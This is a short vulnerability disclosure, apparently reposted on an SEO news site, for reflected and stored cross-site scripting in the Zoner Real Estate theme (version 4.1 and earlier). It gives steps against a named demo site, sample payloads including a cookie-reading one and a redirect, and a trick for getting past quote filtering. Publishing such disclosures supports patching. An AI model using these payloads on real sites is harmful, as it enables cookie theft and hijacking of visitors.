zoner-real-estate Zoner – Real Estate <= 4.1 – Reflected & Stored XSS
Proof of Concept
PoC (Stored XSS Injection): Register on the demo website and go to https://zoner.fruitfulcode.com/author/[your_login]/?profile-page=my_profile page. Inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. For any text box instead of "> use </textarea> first and then your payload. Sample payload #1: ">alert('QUIXSS') Sample payload #2: "><img src="x" onerror="alert('QUIXSS');"> Sample payload #3: "><img src=x onerror=alert('QUIXSS')> PoC (Reflected XSS Injection): Go to any page with the «Search Your Property» form, f.e. https://zoner.fruitfulcode.com/home_v/3/ and use your payload inside the «Keyword» input field. Keep in mind that quotes will be filtered, but u can bypass it by using combination of ` quotes and «no quotes» (check the provided samples). Sample payload #1: "><img src="x" onerror="alert(document.cookie)"> Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>

Source

SEO News and More

SEO News and More

Subscribe ToThe Weekly SEO Trade News Updates

Get the latest SEO, SEM and SMM marketing intel, tips and tricks from one of the best SEO Gurus online. 

Every Tuesday morning we send out an aggregated email listing all new posts on SEO Trade News.

Excellent! Now check your email to confirm your subscription.

Share This